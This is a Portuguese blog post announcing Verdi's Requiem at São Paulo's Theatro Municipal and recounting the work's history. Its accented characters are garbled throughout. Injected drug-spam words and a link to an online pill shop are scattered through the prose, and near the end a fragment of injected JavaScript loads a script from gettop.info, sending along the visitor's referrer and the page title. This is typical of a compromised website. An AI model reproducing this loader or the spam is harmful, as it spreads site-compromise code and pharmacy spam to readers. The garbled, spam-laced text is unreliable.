Música coralMúsica sinfônicaProgramaçãoSão Paulo

“RA�quiem” de Verdi, no Municipal SP

A histA?ria do RA�quiem, de Verdi, pode dizer-se que comeA�a com um pequeno passo na direA�A?o errada.

 

Nos dias 4, 5 e 6 de novembro, A�poca bastante oportuna pela proximidade do Dia dos Mortos, o Theatro Municipal de SA?o Paulo, apresenta ao pA?blico a maravilhosa obra de Verdi, o RA�quiem. A regA?ncia A� de Buy JohnA� Neschling. Os solistas sA?o Elaine Morais (soprano), LA�dia SchA�ffer (mezzo), Marcelo Vanucci Purchase (tenor) e Carlos Eduardo Marcos (baixo).

 

A obra

Corria o ano de 1873, o dia 22 de maio. Alessandro Manzoni, o grande poeta italiano, que conheceu Verdi em 1868, visitava a igreja de S. FidA�lio. Ao sair, tropeA�ou nos degraus da igreja e caiu. Morreu instantaneamente, quando tinha 88 anos de idade. Verdi, sempre um patriota ardente, venerava Manzoni. Este tinha escrito o notA?vel romance, A Esposa Prometida, criando um novo estilo linguA�stico numa ItA?lia entA?o linguisticamente caA?tica. Para alA�m disso, Manzoni tinha sido senador na assembleia que tinha declarado o Reino independente da ItA?lia. Manzoni representava assim o ideal de artista e de patriota.

Menos de quinze dias depois, Verdi anunciava a Giulio Ricordi, o seu amigo e editor, as suas intenA�A�es de escrever um rA�quiem em memA?ria do poeta.A�Verdi tinha entA?o 60 anos. Era ao tempo o maior compositor de A?pera italiano, tendo jA? criado quase todas as suas A?peras, com exceA�A?o de Othello e Falstaff Pills . O seu anA?ncio agitou os cA�rculos musicais e criou muitas expectativas sobre uma obra prima da mA?sica religiosa.

No entanto, pode dizer-se que parte do Requiem jA? havia sido composta. Em Novembro de 1868, morria Rossini, o grande mA?sico italiano. Verdi propA?s que o aniversA?rio da sua morte fosse comemorado com uma Cheap Missa de Requiem, para a qual todos os grandes compositores italianos deveriam contribuir com uma parte. Ele prA?prio escreveria o Libera meA�final. A missa seria tocada na Igreja de S. Petronio, em Bolonha, cidade A� qual Rossini estava intimamente ligado. Todas as partes foram compostas e copiadas em devido tempo, mas a Missa nunca chegou a ser realizada. O empresA?rio local recusou-se a disponibilizar os meios necessA?rios, porque isso implicaria encurtar a sua temporada de A?pera.

Em 1871, falou-se em recuperar este rA�quiem por ocasiA?o da inauguraA�A?o de um busto de Rossini no Teatro a La Scala de MilA?o, mas tal nA?o aconteceu porque a composiA�A?o, no seu conjunto, foi considerada ultrapassada. Entretanto, Alberto Mazzucato, um dos membros da comissA?o que havia analisado as diversas peA�as compostas, e diretor do ConservatA?rio de MilA?o, escreveu a Verdi, pedindo aos cA�us a sua contribuiA�A?o. Verdi respondeu-lhe que estava quase convencido a concluir um RA�quiem seu. O “Libera me” que compA?s A� praticamente o mesmo que hoje conhecemos, tendo-lhe sido acrescentadas referA?ncias ao Dies IraeA�e ao Requiem aeternam. Este Libera me tornou-se, de fato, a semente que havia de gerar o atual RA�quiem http://lifefortravel.com/%ef%bb%bforder-v-gel-capsules/ .

A morte de Alessandro Manzzoni nA?o veio senA?o acelerar os planos de Verdi. No dia 25 de junho, Verdi partiu com sua mulher para Paris, onde comeA�ou a trabalhar na obra, que estava concluA�da no dia 10 de Abril do ano seguinte, 1874, e o prA?prio Verdi dirigiu a sua primeira rA�cita na Igreja de S. Marco, em MilA?o, no dia 22 de Maio, primeiro aniversA?rio da morte de Manzzoni.

A recepA�A?o do pA?blico foi entusiA?stica e pouco depois o RA�quiem conquistava a Europa: 15 representaA�A�es em Paris, entre 1874 e 1875, 4 em Viena e 3 em Londres. Em ItA?lia, tornou-se tA?o popular que muitas vezes foi interpretado sem o consentimento do autor, por bandas militares ou em arranjos para quatroA�pianos. Verdi, que entA?o tentava obter o melhor para a sua obra prima e, de visita a Londres, apenas consentia a sua execuA�A?o no Royal Albert Hall, dada a excelente acA?stica desta sala, nA?o podia aceitar o que estava acontecendo. Mas jA? entA?o o RA�quiem nA?o era propriedade sua. Tinha sido adotado por todo o continente.

A opiniA?o geral foi altamente favorA?vel. Brahms considerava que “sA? um gA?nio poderia ter escrito tal obra“. Havia, contudo, alguns menos entusiastas. O grande maestro Hans von Bulow chamou-lhe “uma A?pera em roupas eclesiA?sticas Purchase ” e Wagner teria dito, “A� melhor nada dizer...”.

A� verdade que o RA�quiem tem alguma coisa de operA?tico. Contudo, em boas interpretaA�A�es, o toque dramA?tico acentua a forA�a da sua composiA�A?o. Quanto a ser ou nA?o uma verdadeira obra eclesiA?stica, a questA?o A� bem diferente. Verdi nA?o era propriamente um catA?lico ortodoxo. AlguA�m ter-lhe-A? chamado um cristA?o agnA?stico, senA?o um nA?o crente. As A?ltimas composiA�A�es de Verdi apresentam uma tendA?ncia para o cromatismo com peculiares variaA�A�es harmA?nicas. No RA�quiem, estas peculiaridades traduzem bem um sentimento, a dA?vida. Esta dA?vida toca muitas partes da composiA�A?o, mas o RA�quiem termina sem uma sombra sequer. Esta dA?vida existia na alma semicrente do compositor e esteve presente em toda a sua mA?sica.

Acerca do RA�quiem, Hanslick escreveu. ” A devoA�A?o religiosa tambA�m varia nas suas formas de expressA?o, conforme os paA�ses e o seu tempo. O que parece ser tA?o apaixonado, tA?o sensual no RA�quiem de Verdi resulta dos hA?bitos do seu povo, e os italianos tem todo o direito de perguntar se nA?o lhes A� permitido falar com Deus na sua prA?pria lA�ngua!”

De entre as muitas composiA�A�es de Verdi, o RA�quiem A� normalmente considerada a mais condensada, sem quaisquer pausas ou interrupA�A�es operA?ticas. Os musicA?logos dizem ser uma das suas composiA�A�es mais complexas.

A�, certamente, uma das mais belas!

AssociaA�A?o Amigos do Coliseu do Porto e Jan Jensen Buy

 

 

SERVIA�O

 

 

Theatro Municipal de SA?o Paulo
PraA�a Ramos de Azevedo, s/no.
Fone: 11 3397 0327

Dias 4, 5 e 6 de novembro, A�s 20h.

cialis canada trackable Ingressos: de R$ 20,00 a R$ 70,00

 

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; } else {

movimento.com
Responsável pela inclusão de programação e assuntos genéricos no blog.